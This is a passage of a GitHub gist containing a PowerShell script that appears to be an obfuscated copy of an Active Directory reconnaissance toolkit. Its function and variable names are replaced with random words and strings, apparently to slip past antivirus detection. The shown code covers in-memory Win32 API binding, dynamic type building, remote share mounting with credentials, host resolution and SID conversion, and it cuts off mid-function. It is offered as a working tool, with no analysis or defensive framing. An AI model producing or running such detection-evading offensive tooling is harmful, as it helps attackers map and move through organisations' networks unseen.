Last active
May 11, 2022 21:02
-
-
Save alacerda/d1b27a732cd980bf6043b4489cbb7acb to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function embroil { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ModuleName = [Guid]::NewGuid().ToString() | |
) | |
$PhtttnVb99 = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @()) | |
$amdRWXsc99 = $PhtttnVb99.GetAssemblies() | |
foreach ($kqBqnocM99 in $amdRWXsc99) { | |
if ($kqBqnocM99.FullName -and ($kqBqnocM99.FullName.Split(',')[0] -eq $ModuleName)) { | |
return $kqBqnocM99 | |
} | |
} | |
$ZfBHkVgx99 = New-Object Reflection.AssemblyName($ModuleName) | |
$ADDDGomQ99 = $PhtttnVb99 | |
$aHcWOlrb99 = $ADDDGomQ99.DefineDynamicAssembly($ZfBHkVgx99, 'Run') | |
$JFJnzFGY99 = $aHcWOlrb99.DefineDynamicModule($ModuleName, $False) | |
return $JFJnzFGY99 | |
} | |
function func { | |
Param ( | |
[Parameter(Position = 0, Mandatory = $True)] | |
[String] | |
$DllName, | |
[Parameter(Position = 1, Mandatory = $True)] | |
[string] | |
$FunctionName, | |
[Parameter(Position = 2, Mandatory = $True)] | |
[Type] | |
$ReturnType, | |
[Parameter(Position = 3)] | |
[Type[]] | |
$ParameterTypes, | |
[Parameter(Position = 4)] | |
[Runtime.InteropServices.CallingConvention] | |
$NativeCallingConvention, | |
[Parameter(Position = 5)] | |
[Runtime.InteropServices.CharSet] | |
$Charset, | |
[String] | |
$QdFxDKXu99, | |
[Switch] | |
$SetLastError | |
) | |
$nmZxBYze99 = @{ | |
DllName = $DllName | |
FunctionName = $FunctionName | |
ReturnType = $ReturnType | |
} | |
if ($ParameterTypes) { $nmZxBYze99['ParameterTypes'] = $ParameterTypes } | |
if ($NativeCallingConvention) { $nmZxBYze99['NativeCallingConvention'] = $NativeCallingConvention } | |
if ($Charset) { $nmZxBYze99['Charset'] = $Charset } | |
if ($SetLastError) { $nmZxBYze99['SetLastError'] = $SetLastError } | |
if ($QdFxDKXu99) { $nmZxBYze99['EntryPoint'] = $QdFxDKXu99 } | |
New-Object PSObject -Property $nmZxBYze99 | |
} | |
function immortalizes | |
{ | |
[OutputType([Hashtable])] | |
Param( | |
[Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)] | |
[String] | |
$DllName, | |
[Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)] | |
[String] | |
$FunctionName, | |
[Parameter(ValueFromPipelineByPropertyName=$True)] | |
[String] | |
$QdFxDKXu99, | |
[Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)] | |
[Type] | |
$ReturnType, | |
[Parameter(ValueFromPipelineByPropertyName=$True)] | |
[Type[]] | |
$ParameterTypes, | |
[Parameter(ValueFromPipelineByPropertyName=$True)] | |
[Runtime.InteropServices.CallingConvention] | |
$NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall, | |
[Parameter(ValueFromPipelineByPropertyName=$True)] | |
[Runtime.InteropServices.CharSet] | |
$Charset = [Runtime.InteropServices.CharSet]::Auto, | |
[Parameter(ValueFromPipelineByPropertyName=$True)] | |
[Switch] | |
$SetLastError, | |
[Parameter(Mandatory=$True)] | |
[ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] | |
$Module, | |
[ValidateNotNull()] | |
[String] | |
$Namespace = '' | |
) | |
BEGIN | |
{ | |
$tRVNUThk99 = @{} | |
} | |
PROCESS | |
{ | |
if ($Module -is [Reflection.Assembly]) | |
{ | |
if ($Namespace) | |
{ | |
$tRVNUThk99[$DllName] = $Module.GetType("$Namespace.$DllName") | |
} | |
else | |
{ | |
$tRVNUThk99[$DllName] = $Module.GetType($DllName) | |
} | |
} | |
else | |
{ | |
if (!$tRVNUThk99.ContainsKey($DllName)) | |
{ | |
if ($Namespace) | |
{ | |
$tRVNUThk99[$DllName] = $Module.DefineType("$Namespace.$DllName", 'Public,BeforeFieldInit') | |
} | |
else | |
{ | |
$tRVNUThk99[$DllName] = $Module.DefineType($DllName, 'Public,BeforeFieldInit') | |
} | |
} | |
$vjFnrNGz99 = $tRVNUThk99[$DllName].DefineMethod( | |
$FunctionName, | |
'Public,Static,PinvokeImpl', | |
$ReturnType, | |
$ParameterTypes) | |
$i = 1 | |
foreach($MuqMXLcx99 in $ParameterTypes) | |
{ | |
if ($MuqMXLcx99.IsByRef) | |
{ | |
[void] $vjFnrNGz99.DefineParameter($i, 'Out', $null) | |
} | |
$i++ | |
} | |
$ZVaiaNqc99 = [Runtime.InteropServices.DllImportAttribute] | |
$QRCQDdWp99 = $ZVaiaNqc99.GetField('SetLastError') | |
$KioFUkbT99 = $ZVaiaNqc99.GetField('CallingConvention') | |
$QfilhUau99 = $ZVaiaNqc99.GetField('CharSet') | |
$nYANgrby99 = $ZVaiaNqc99.GetField('EntryPoint') | |
if ($SetLastError) { $jThPVquB99 = $True } else { $jThPVquB99 = $False } | |
if ($PSBoundParameters['EntryPoint']) { $caRhgYur99 = $QdFxDKXu99 } else { $caRhgYur99 = $FunctionName } | |
$Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String]) | |
$HyRLtQvn99 = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor, | |
$DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(), | |
[Reflection.FieldInfo[]] @($QRCQDdWp99, | |
$KioFUkbT99, | |
$QfilhUau99, | |
$nYANgrby99), | |
[Object[]] @($jThPVquB99, | |
([Runtime.InteropServices.CallingConvention] $NativeCallingConvention), | |
([Runtime.InteropServices.CharSet] $Charset), | |
$caRhgYur99)) | |
$vjFnrNGz99.SetCustomAttribute($HyRLtQvn99) | |
} | |
} | |
END | |
{ | |
if ($Module -is [Reflection.Assembly]) | |
{ | |
return $tRVNUThk99 | |
} | |
$QIFxDGfd99 = @{} | |
foreach ($Key in $tRVNUThk99.Keys) | |
{ | |
$Type = $tRVNUThk99[$Key].CreateType() | |
$QIFxDGfd99[$Key] = $Type | |
} | |
return $QIFxDGfd99 | |
} | |
} | |
function embolisms { | |
[OutputType([Type])] | |
Param ( | |
[Parameter(Position = 0, Mandatory=$True)] | |
[ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] | |
$Module, | |
[Parameter(Position = 1, Mandatory=$True)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$WfzGkyHr99, | |
[Parameter(Position = 2, Mandatory=$True)] | |
[Type] | |
$Type, | |
[Parameter(Position = 3, Mandatory=$True)] | |
[ValidateNotNullOrEmpty()] | |
[Hashtable] | |
$CxGIBjQH99, | |
[Switch] | |
$Bitfield | |
) | |
if ($Module -is [Reflection.Assembly]) | |
{ | |
return ($Module.GetType($WfzGkyHr99)) | |
} | |
$ycLLDCku99 = $Type -as [Type] | |
$DMmbuZoj99 = $Module.DefineEnum($WfzGkyHr99, 'Public', $ycLLDCku99) | |
if ($Bitfield) | |
{ | |
$TWllnXLO99 = [FlagsAttribute].GetConstructor(@()) | |
$gkTNYWan99 = New-Object Reflection.Emit.CustomAttributeBuilder($TWllnXLO99, @()) | |
$DMmbuZoj99.SetCustomAttribute($gkTNYWan99) | |
} | |
foreach ($Key in $CxGIBjQH99.Keys) | |
{ | |
$null = $DMmbuZoj99.DefineLiteral($Key, $CxGIBjQH99[$Key] -as $ycLLDCku99) | |
} | |
$DMmbuZoj99.CreateType() | |
} | |
function field { | |
Param ( | |
[Parameter(Position = 0, Mandatory=$True)] | |
[UInt16] | |
$UVGLCEmH99, | |
[Parameter(Position = 1, Mandatory=$True)] | |
[Type] | |
$Type, | |
[Parameter(Position = 2)] | |
[UInt16] | |
$iSpjhTbK99, | |
[Object[]] | |
$MarshalAs | |
) | |
@{ | |
Position = $UVGLCEmH99 | |
Type = $Type -as [Type] | |
Offset = $iSpjhTbK99 | |
MarshalAs = $MarshalAs | |
} | |
} | |
function lunatics | |
{ | |
[OutputType([Type])] | |
Param ( | |
[Parameter(Position = 1, Mandatory=$True)] | |
[ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] | |
$Module, | |
[Parameter(Position = 2, Mandatory=$True)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$WfzGkyHr99, | |
[Parameter(Position = 3, Mandatory=$True)] | |
[ValidateNotNullOrEmpty()] | |
[Hashtable] | |
$vRfvhybh99, | |
[Reflection.Emit.PackingSize] | |
$KAHAslPj99 = [Reflection.Emit.PackingSize]::Unspecified, | |
[Switch] | |
$qtFGuJJw99 | |
) | |
if ($Module -is [Reflection.Assembly]) | |
{ | |
return ($Module.GetType($WfzGkyHr99)) | |
} | |
[Reflection.TypeAttributes] $WjexbOqg99 = 'AnsiClass, | |
Class, | |
Public, | |
Sealed, | |
BeforeFieldInit' | |
if ($qtFGuJJw99) | |
{ | |
$WjexbOqg99 = $WjexbOqg99 -bor [Reflection.TypeAttributes]::ExplicitLayout | |
} | |
else | |
{ | |
$WjexbOqg99 = $WjexbOqg99 -bor [Reflection.TypeAttributes]::SequentialLayout | |
} | |
$RhZEsrjV99 = $Module.DefineType($WfzGkyHr99, $WjexbOqg99, [ValueType], $KAHAslPj99) | |
$TPTbKXLP99 = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] | |
$DfTMkgxN99 = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst')) | |
$KdJYZJiV99 = New-Object Hashtable[]($vRfvhybh99.Count) | |
foreach ($Field in $vRfvhybh99.Keys) | |
{ | |
$Index = $vRfvhybh99[$Field]['Position'] | |
$KdJYZJiV99[$Index] = @{FieldName = $Field; Properties = $vRfvhybh99[$Field]} | |
} | |
foreach ($Field in $KdJYZJiV99) | |
{ | |
$NxjHZsBu99 = $Field['FieldName'] | |
$oonhMEPf99 = $Field['Properties'] | |
$iSpjhTbK99 = $oonhMEPf99['Offset'] | |
$Type = $oonhMEPf99['Type'] | |
$MarshalAs = $oonhMEPf99['MarshalAs'] | |
$jrMdyiHl99 = $RhZEsrjV99.DefineField($NxjHZsBu99, $Type, 'Public') | |
if ($MarshalAs) | |
{ | |
$jbvYJnTw99 = $MarshalAs[0] -as ([Runtime.InteropServices.UnmanagedType]) | |
if ($MarshalAs[1]) | |
{ | |
$Size = $MarshalAs[1] | |
$INUSSKXb99 = New-Object Reflection.Emit.CustomAttributeBuilder($TPTbKXLP99, | |
$jbvYJnTw99, $DfTMkgxN99, @($Size)) | |
} | |
else | |
{ | |
$INUSSKXb99 = New-Object Reflection.Emit.CustomAttributeBuilder($TPTbKXLP99, [Object[]] @($jbvYJnTw99)) | |
} | |
$jrMdyiHl99.SetCustomAttribute($INUSSKXb99) | |
} | |
if ($qtFGuJJw99) { $jrMdyiHl99.SetOffset($iSpjhTbK99) } | |
} | |
$zESiwwJR99 = $RhZEsrjV99.DefineMethod('GetSize', | |
'Public, Static', | |
[Int], | |
[Type[]] @()) | |
$ZWPKlFma99 = $zESiwwJR99.GetILGenerator() | |
$ZWPKlFma99.Emit([Reflection.Emit.OpCodes]::Ldtoken, $RhZEsrjV99) | |
$ZWPKlFma99.Emit([Reflection.Emit.OpCodes]::Call, | |
[Type].GetMethod('GetTypeFromHandle')) | |
$ZWPKlFma99.Emit([Reflection.Emit.OpCodes]::Call, | |
[Runtime.InteropServices.Marshal].GetMethod('SizeOf', [Type[]] @([Type]))) | |
$ZWPKlFma99.Emit([Reflection.Emit.OpCodes]::Ret) | |
$VuHgXYVl99 = $RhZEsrjV99.DefineMethod('op_Implicit', | |
'PrivateScope, Public, Static, HideBySig, SpecialName', | |
$RhZEsrjV99, | |
[Type[]] @([IntPtr])) | |
$VcfdhgnO99 = $VuHgXYVl99.GetILGenerator() | |
$VcfdhgnO99.Emit([Reflection.Emit.OpCodes]::Nop) | |
$VcfdhgnO99.Emit([Reflection.Emit.OpCodes]::Ldarg_0) | |
$VcfdhgnO99.Emit([Reflection.Emit.OpCodes]::Ldtoken, $RhZEsrjV99) | |
$VcfdhgnO99.Emit([Reflection.Emit.OpCodes]::Call, | |
[Type].GetMethod('GetTypeFromHandle')) | |
$VcfdhgnO99.Emit([Reflection.Emit.OpCodes]::Call, | |
[Runtime.InteropServices.Marshal].GetMethod('PtrToStructure', [Type[]] @([IntPtr], [Type]))) | |
$VcfdhgnO99.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $RhZEsrjV99) | |
$VcfdhgnO99.Emit([Reflection.Emit.OpCodes]::Ret) | |
$RhZEsrjV99.CreateType() | |
} | |
Function imperturbability { | |
[CmdletBinding(DefaultParameterSetName = 'DynamicParameter')] | |
Param ( | |
[Parameter(Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[ValidateNotNullOrEmpty()] | |
[string]$Name, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[System.Type]$Type = [int], | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[string[]]$Alias, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[switch]$lOXlKWJS99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[int]$UVGLCEmH99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[string]$ZAqaWtsY99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[switch]$sjjuaAea99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[switch]$HlFKCNBR99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[switch]$xgdfYLYL99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[switch]$fznydYqo99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[string]$qkwBzUnt99 = '__AllParameterSets', | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[switch]$dpmyigPL99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[switch]$rjjyyKbF99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[switch]$JSuOApKr99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[switch]$GlnlXfAo99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[switch]$YyNxViKY99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[ValidateCount(2,2)] | |
[int[]]$WApEHtHa99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[ValidateCount(2,2)] | |
[int[]]$JPAQubpP99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[ValidateCount(2,2)] | |
[int[]]$yWJXMWsF99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[ValidateNotNullOrEmpty()] | |
[string]$nkicNlVb99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[ValidateNotNullOrEmpty()] | |
[scriptblock]$fzmfjDKT99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[ValidateNotNullOrEmpty()] | |
[string[]]$sADNIewc99, | |
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] | |
[ValidateNotNullOrEmpty()] | |
[ValidateScript({ | |
if(!($_ -is [System.Management.Automation.RuntimeDefinedParameterDictionary])) | |
{ | |
Throw 'Dictionary must be a System.Management.Automation.RuntimeDefinedParameterDictionary object' | |
} | |
$true | |
})] | |
$rzbbKXik99 = $false, | |
[Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')] | |
[switch]$aRhKtQBk99, | |
[Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')] | |
[ValidateNotNullOrEmpty()] | |
[ValidateScript({ | |
if($_.GetType().Name -notmatch 'Dictionary') { | |
Throw 'BoundParameters must be a System.Management.Automation.PSBoundParametersDictionary object' | |
} | |
$true | |
})] | |
$kHkbQGKb99 | |
) | |
Begin { | |
$tFdwPrQI99 = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameterDictionary | |
function _temp { [CmdletBinding()] Param() } | |
$roXJkhfM99 = (Get-Command _temp).Parameters.Keys | |
} | |
Process { | |
if($aRhKtQBk99) { | |
$RizfGKOX99 = $kHkbQGKb99.Keys | Where-Object { $roXJkhfM99 -notcontains $_ } | |
ForEach($MuqMXLcx99 in $RizfGKOX99) { | |
if ($MuqMXLcx99) { | |
Set-Variable -Name $MuqMXLcx99 -Value $kHkbQGKb99.$MuqMXLcx99 -Scope 1 -Force | |
} | |
} | |
} | |
else { | |
$omFFKmeU99 = @() | |
$omFFKmeU99 = $PSBoundParameters.GetEnumerator() | | |
ForEach-Object { | |
if($_.Value.PSobject.Methods.Name -match '^Equals$') { | |
if(!$_.Value.Equals((Get-Variable -Name $_.Key -ValueOnly -Scope 0))) { | |
$_.Key | |
} | |
} | |
else { | |
if($_.Value -ne (Get-Variable -Name $_.Key -ValueOnly -Scope 0)) { | |
$_.Key | |
} | |
} | |
} | |
if($omFFKmeU99) { | |
$omFFKmeU99 | ForEach-Object {[void]$PSBoundParameters.Remove($_)} | |
} | |
$BsYMjAQE99 = (Get-Command -Name ($PSCmdlet.MyInvocation.InvocationName)).Parameters.GetEnumerator() | | |
Where-Object { $_.Value.ParameterSets.Keys -contains $PsCmdlet.ParameterSetName } | | |
Select-Object -ExpandProperty Key | | |
Where-Object { $PSBoundParameters.Keys -notcontains $_ } | |
$tmp = $null | |
ForEach ($MuqMXLcx99 in $BsYMjAQE99) { | |
$pozunHzy99 = Get-Variable -Name $MuqMXLcx99 -ValueOnly -Scope 0 | |
if(!$PSBoundParameters.TryGetValue($MuqMXLcx99, [ref]$tmp) -and $pozunHzy99) { | |
$PSBoundParameters.$MuqMXLcx99 = $pozunHzy99 | |
} | |
} | |
if($rzbbKXik99) { | |
$KdLYVMHz99 = $rzbbKXik99 | |
} | |
else { | |
$KdLYVMHz99 = $tFdwPrQI99 | |
} | |
$ufbuSEUM99 = {Get-Variable -Name $_ -ValueOnly -Scope 0} | |
$FGAAczwn99 = '^(Mandatory|Position|ParameterSetName|DontShow|HelpMessage|ValueFromPipeline|ValueFromPipelineByPropertyName|ValueFromRemainingArguments)$' | |
$gJxjFNKV99 = '^(AllowNull|AllowEmptyString|AllowEmptyCollection|ValidateCount|ValidateLength|ValidatePattern|ValidateRange|ValidateScript|ValidateSet|ValidateNotNull|ValidateNotNullOrEmpty)$' | |
$LIwCJEPr99 = '^Alias$' | |
$lSTsbcVb99 = New-Object -TypeName System.Management.Automation.ParameterAttribute | |
switch -regex ($PSBoundParameters.Keys) { | |
$FGAAczwn99 { | |
Try { | |
$lSTsbcVb99.$_ = . $ufbuSEUM99 | |
} | |
Catch { | |
$_ | |
} | |
continue | |
} | |
} | |
if($KdLYVMHz99.Keys -contains $Name) { | |
$KdLYVMHz99.$Name.Attributes.Add($lSTsbcVb99) | |
} | |
else { | |
$eGyilxhY99 = New-Object -TypeName Collections.ObjectModel.Collection[System.Attribute] | |
switch -regex ($PSBoundParameters.Keys) { | |
$gJxjFNKV99 { | |
Try { | |
$ofzGVhHY99 = New-Object -TypeName "System.Management.Automation.${_}Attribute" -ArgumentList (. $ufbuSEUM99) -ErrorAction Stop | |
$eGyilxhY99.Add($ofzGVhHY99) | |
} | |
Catch { $_ } | |
continue | |
} | |
$LIwCJEPr99 { | |
Try { | |
$uBSBYYUR99 = New-Object -TypeName System.Management.Automation.AliasAttribute -ArgumentList (. $ufbuSEUM99) -ErrorAction Stop | |
$eGyilxhY99.Add($uBSBYYUR99) | |
continue | |
} | |
Catch { $_ } | |
} | |
} | |
$eGyilxhY99.Add($lSTsbcVb99) | |
$MuqMXLcx99 = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameter -ArgumentList @($Name, $Type, $eGyilxhY99) | |
$KdLYVMHz99.Add($Name, $MuqMXLcx99) | |
} | |
} | |
} | |
End { | |
if(!$aRhKtQBk99 -and !$rzbbKXik99) { | |
$KdLYVMHz99 | |
} | |
} | |
} | |
function unoccupied { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType([Hashtable])] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('FullName', 'Name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$Path, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$UzMfZrJa99 | |
) | |
BEGIN { | |
$IrlHyazy99 = @{} | |
} | |
PROCESS { | |
ForEach ($RtHoTVXK99 in $Path) { | |
if (($RtHoTVXK99 -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { | |
$tcwSUBNN99 = (New-Object System.Uri($RtHoTVXK99)).Host | |
if (-not $IrlHyazy99[$tcwSUBNN99]) { | |
Andes -MqGzGCsi99 $tcwSUBNN99 -KWcDeQDF99 $KWcDeQDF99 | |
$IrlHyazy99[$tcwSUBNN99] = $True | |
} | |
} | |
if (Test-Path -Path $RtHoTVXK99) { | |
if ($PSBoundParameters['OutputObject']) { | |
$hXTZhOlM99 = New-Object PSObject | |
} | |
else { | |
$hXTZhOlM99 = @{} | |
} | |
Switch -Regex -File $RtHoTVXK99 { | |
"^\[(.+)\]" # Section | |
{ | |
$wMlvNUNX99 = $matches[1].Trim() | |
if ($PSBoundParameters['OutputObject']) { | |
$wMlvNUNX99 = $wMlvNUNX99.Replace(' ', '') | |
$GurFTMLq99 = New-Object PSObject | |
$hXTZhOlM99 | Add-Member Noteproperty $wMlvNUNX99 $GurFTMLq99 | |
} | |
else { | |
$hXTZhOlM99[$wMlvNUNX99] = @{} | |
} | |
$DBZixxwq99 = 0 | |
} | |
"^(;.*)$" # Comment | |
{ | |
$Value = $matches[1].Trim() | |
$DBZixxwq99 = $DBZixxwq99 + 1 | |
$Name = 'Comment' + $DBZixxwq99 | |
if ($PSBoundParameters['OutputObject']) { | |
$Name = $Name.Replace(' ', '') | |
$hXTZhOlM99.$wMlvNUNX99 | Add-Member Noteproperty $Name $Value | |
} | |
else { | |
$hXTZhOlM99[$wMlvNUNX99][$Name] = $Value | |
} | |
} | |
"(.+?)\s*=(.*)" # Key | |
{ | |
$Name, $Value = $matches[1..2] | |
$Name = $Name.Trim() | |
$kpwzAykt99 = $Value.split(',') | ForEach-Object { $_.Trim() } | |
if ($PSBoundParameters['OutputObject']) { | |
$Name = $Name.Replace(' ', '') | |
$hXTZhOlM99.$wMlvNUNX99 | Add-Member Noteproperty $Name $kpwzAykt99 | |
} | |
else { | |
$hXTZhOlM99[$wMlvNUNX99][$Name] = $kpwzAykt99 | |
} | |
} | |
} | |
$hXTZhOlM99 | |
} | |
} | |
} | |
END { | |
$IrlHyazy99.Keys | bauxite | |
} | |
} | |
function frisking { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[System.Management.Automation.PSObject[]] | |
$MdtHuWsJ99, | |
[Parameter(Mandatory = $True, Position = 1)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$Path, | |
[Parameter(Position = 2)] | |
[ValidateNotNullOrEmpty()] | |
[Char] | |
$DlwaLqfa99 = ',', | |
[Switch] | |
$CMiUCRid99 | |
) | |
BEGIN { | |
$sNBygSfo99 = [IO.Path]::GetFullPath($PSBoundParameters['Path']) | |
$lfDviiYT99 = [System.IO.File]::Exists($sNBygSfo99) | |
$Mutex = New-Object System.Threading.Mutex $False,'CSVMutex' | |
$Null = $Mutex.WaitOne() | |
if ($PSBoundParameters['Append']) { | |
$IeGeBswf99 = [System.IO.FileMode]::Append | |
} | |
else { | |
$IeGeBswf99 = [System.IO.FileMode]::Create | |
$lfDviiYT99 = $False | |
} | |
$zZJgMAuY99 = New-Object IO.FileStream($sNBygSfo99, $IeGeBswf99, [System.IO.FileAccess]::Write, [IO.FileShare]::Read) | |
$OTopjWrR99 = New-Object System.IO.StreamWriter($zZJgMAuY99) | |
$OTopjWrR99.AutoFlush = $True | |
} | |
PROCESS { | |
ForEach ($Entry in $MdtHuWsJ99) { | |
$VVwsKFao99 = ConvertTo-Csv -MdtHuWsJ99 $Entry -DlwaLqfa99 $DlwaLqfa99 -NoTypeInformation | |
if (-not $lfDviiYT99) { | |
$VVwsKFao99 | ForEach-Object { $OTopjWrR99.WriteLine($_) } | |
$lfDviiYT99 = $True | |
} | |
else { | |
$VVwsKFao99[1..($VVwsKFao99.Length-1)] | ForEach-Object { $OTopjWrR99.WriteLine($_) } | |
} | |
} | |
} | |
END { | |
$Mutex.ReleaseMutex() | |
$OTopjWrR99.Dispose() | |
$zZJgMAuY99.Dispose() | |
} | |
} | |
function huckstering { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('System.Management.Automation.PSCustomObject')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = $Env:COMPUTERNAME | |
) | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
try { | |
@(([Net.Dns]::GetHostEntry($GrySniik99)).AddressList) | ForEach-Object { | |
if ($_.AddressFamily -eq 'InterNetwork') { | |
$Out = New-Object PSObject | |
$Out | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$Out | Add-Member Noteproperty 'IPAddress' $_.IPAddressToString | |
$Out | |
} | |
} | |
} | |
catch { | |
Write-Verbose "[huckstering] Could not resolve $GrySniik99 to an IP Address." | |
} | |
} | |
} | |
} | |
function epics { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType([String])] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('Name', 'Identity')] | |
[String[]] | |
$LqFIdcne99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$hxDFRKSl99 = @{} | |
if ($PSBoundParameters['Domain']) { $hxDFRKSl99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Server']) { $hxDFRKSl99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['Credential']) { $hxDFRKSl99['Credential'] = $KWcDeQDF99 } | |
} | |
PROCESS { | |
ForEach ($Object in $LqFIdcne99) { | |
$Object = $Object -Replace '/','\' | |
if ($PSBoundParameters['Credential']) { | |
$DN = plagiarist -mxWgOMSt99 $Object -sVUXjDxI99 'DN' @DomainSearcherArguments | |
if ($DN) { | |
$VeuSFWRJ99 = $DN.SubString($DN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
$bnjyYveg99 = $DN.Split(',')[0].split('=')[1] | |
$hxDFRKSl99['Identity'] = $bnjyYveg99 | |
$hxDFRKSl99['Domain'] = $VeuSFWRJ99 | |
$hxDFRKSl99['Properties'] = 'objectsid' | |
sniffling @DomainSearcherArguments | Select-Object -Expand objectsid | |
} | |
} | |
else { | |
try { | |
if ($Object.Contains('\')) { | |
$ADDDGomQ99 = $Object.Split('\')[0] | |
$Object = $Object.Split('\')[1] | |
} | |
elseif (-not $PSBoundParameters['Domain']) { | |
$hxDFRKSl99 = @{} | |
$ADDDGomQ99 = (aforethought @DomainSearcherArguments).Name | |
} | |
$Obj = (New-Object System.Security.Principal.NTAccount($ADDDGomQ99, $Object)) | |
$Obj.Translate([System.Security.Principal.SecurityIdentifier]).Value | |
} | |
catch { | |
Write-Verbose "[epics] Error converting $ADDDGomQ99\$Object : $_" | |
} | |
} | |
} | |
} | |
} | |
function Malory { | |
[OutputType([String])] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('SID')] | |
[ValidatePattern('^S-1-.*')] | |
[String[]] | |
$DHIjlbmp99, | |
